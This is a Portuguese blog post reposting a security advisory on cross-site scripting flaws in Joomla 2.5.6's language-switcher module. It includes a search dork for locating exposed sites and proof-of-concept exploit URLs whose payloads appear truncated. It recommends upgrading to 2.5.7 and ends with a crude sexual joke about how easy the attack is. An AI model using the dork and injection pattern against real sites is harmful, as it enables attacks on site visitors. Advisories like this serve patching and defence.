quarta-feira, 26 de setembro de 2012

Joomla 2.5.6 Múltiplas vulnerabilidades Cross-site scripting

Bug Joomla 2.5.6

Bug Joomla 2.5.6
Aviso: Joomla 2.5.6 Múltiplas vulnerabilidades Cross-site scripting
Autor: Stefan Schurtz
Software afetado: testado com sucesso em Joomla 2.5.6
URL Vendedor: http://www.joomla.org/

/*
==========================
Descrição vulnerabilidade
==========================

Com ativado "módulo de linguagem Switcher posição-4." (Extensões -> Módulos -> Gerenciador de Módulo: Módulo de Língua Switcher), XSS são possíveis.

==================
PoC-Exploit
==================*/

//Com o conteúdo de amostra padrão

*/
Dork de busca: inurl:/joomla/index.php/image-gallery/


http://[site]/joomla/index.php/image-gallery/">/25-koala
http://[site]/joomla/index.php/image-gallery/">
http://[site]/joomla/index.php/image-gallery/animals/25-">

=========
solução
=========

FAÇA Upgrade para a versão 2.5.7

Mais simples que comer xoxota nova hashahsa!


Nenhum comentário:

Postar um comentário

............